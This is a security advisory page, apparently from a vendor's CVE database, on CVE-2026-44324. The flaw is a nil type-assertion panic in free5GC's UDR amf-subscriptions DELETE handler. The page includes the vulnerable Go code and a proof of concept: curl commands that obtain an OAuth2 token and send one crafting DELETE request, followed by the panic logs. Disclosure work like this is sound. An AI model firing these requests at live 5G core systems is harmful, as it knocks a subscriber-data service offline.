Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2026-44324 — free5gc

🟡 CVSS 6.5 — Medium ⚠️ Exploit Public CWE-704 NVD
6.5
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

free5GC's UDR nudr-dr DELETE amf-subscriptions panics on missing UE state via nil interface type assertion (single authenticated request)

Summary

free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler panics on a single authenticated request against a fresh UDR instance when the supplied ueId does not exist in UESubsCollection. The processor checks value, ok := udrSelf.UESubsCollection.Load(ueId) and sets a 404 USER_NOT_FOUND problem-details on the miss path, but execution continues and immediately runs value.(*udr_context.UESubsData) -- a Go type assertion on a nil interface, which panics with interface conversion: interface {} is nil, not *context.UESubsData. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable.

This is the no-precondition sibling of free5gc/free5gc#919: same handler, same bug pattern (set pd, do not return, then dereference), but the panic site is the nil-interface type assertion at line 61 instead of the nil-pointer deref at line 69. No earlier EE-subscription create is required.

This endpoint requires a valid nudr-dr OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated panic-DoS, not as an unauth-bypass finding.

Details

Validated against the UDR container in the official Docker compose lab.

  • Source repo tag: v4.2.1
  • Running Docker image: free5gc/udr:v4.2.1
  • Runtime UDR commit: 754d23b0
  • Docker validation date: 2026-03-22
  • UDR endpoint: http://10.100.200.11:8000

Vulnerable handler (the ok miss path sets pd but does not return; the next line type-asserts the nil interface):

```go

subsId := c.Params.ByName("subsId")

s.Processor().RemoveAmfSubscriptionsInfoProcedure(c, subsId, ueId)

```

In the processor:

```go

value, ok := udrSelf.UESubsCollection.Load(ueId)

if !ok {

pd = util.ProblemDetailsNotFound("USER_NOT_FOUND")

}

UESubsData := value.(*udr_context.UESubsData) // panics: nil interface

```

When ueId is absent from UESubsCollection, value is the nil interface{} returned by sync.Map.Load, and value.(*udr_context.UESubsData) panics with:

```

panic: interface conversion: interface {} is nil, not *context.UESubsData

```

Code evidence (paths in free5gc/udr):

  • Route exposure + handler dispatch:
  • NFs/udr/internal/sbi/api_datarepository.go:2161
  • NFs/udr/internal/sbi/api_datarepository.go:2170
  • NFs/udr/internal/sbi/api_datarepository.go:2172
  • Panic root cause (nil interface type assertion):
  • NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:53
  • NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:56
  • NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:61

PoC

Reproduced end-to-end against the running UDR at http://10.100.200.11:8000 -- single authenticated request, no preconditions.

1. Restart UDR (clean state -- proves no precondition is needed):

```

docker restart udr

```

2. Obtain a valid nudr-dr token from NRF:

```

curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \

-H 'Content-Type: application/x-www-form-urlencoded' \

--data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=UDR&scope=nudr-dr'

```

3. Trigger the panic with one DELETE for a nonexistent ueId=x:

```

curl -i -sS -X DELETE \

'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions' \

-H 'Authorization: Bearer <valid_nudr_dr_jwt>'

```

```

HTTP/1.1 500 Internal Server Error

Content-Length: 0

```

4. UDR container logs (docker logs udr) confirm the nil-interface conversion panic at event_amf_subscription_info_document.go:61 inside RemoveAmfSubscriptionsInfoProcedure:

```

[ERRO][UDR][GIN] panic: interface conversion: interface {} is nil, not *context.UESubsData

github.com/free5gc/udr/internal/sbi/processor.(*Processor).RemoveAmfSubscriptionsInfoProcedure

.../event_amf_subscription_info_document.go:61

github.com/free5gc/udr/internal/sbi.(*Server).HandleRemoveAmfSubscriptionsInfo

.../api_datarepository.go:2172

[INFO][UDR][GIN] | 500 | DELETE | /nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions |

```

Impact

Incorrect type conversion on a nil interface (CWE-704) inside an authenticated UDR data-repository handler, caused by improper handling of the missing-ueId branch (CWE-754): the handler sets a 404 problem-details value but does not return, then runs a Go type assertion on the nil interface returned by sync.Map.Load.

This is NOT framed as an auth-bypass finding: the endpoint requires a valid nudr-dr OAuth2 access token. A network attacker who already holds (or can obtain) a valid token can:

  • Trigger a reliable, single-request panic on the amf-subscriptions delete route against a fresh UDR (no preparatory state needed -- this is strictly easier than free5gc/free5gc#919).

-

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs low-level privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity none, availability high.

CVSS metrics in full

The score comes from this vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: Low — the attack works reliably, with no preparation.
  • Privileges required: Low — an ordinary user account is enough.
  • User interaction: None — nobody has to be tricked into anything.
  • Scope: Unchanged — the damage stays inside the vulnerable component.
  • Confidentiality impact: None.
  • Integrity impact: None.
  • Availability impact: High — total loss, or loss the attacker controls.

Weakness class

CVE-2026-44324 is classified as CWE-704: Incorrect Type Conversion or Cast. The product does not correctly convert an object, resource, or structure from one type to a different type.

Affected software

CVE-2026-44324 is recorded against 2 packages.

  • free5gc (fixed in 4.2.2)
  • github.com/free5gc/udr

Timeline and source

Published on 27 May 2026 and last revised on 17 June 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from NVD.

References

github.com
github.com
github.com
github.com
github.com
github.com

Other advisories for this package

free5gc has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-704: Incorrect Type Conversion or Cast) in other software:

Details

Severity MEDIUM
CVSS Score 6.5
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CWE CWE-704
Public Exploit ⚠️ Yes
Source NVD
Published 2026-05-27
Updated 2026-08-20
Modified 2026-06-17

Affected Packages

Software From version Fixed in
free5gc 4.2.2
github.com/free5gc/udr

Similar Threats

Exploit Protection

Are you running free5gc?

CVE-2026-44324 carries CVSS 6.5 Medium rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2026-44324 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2026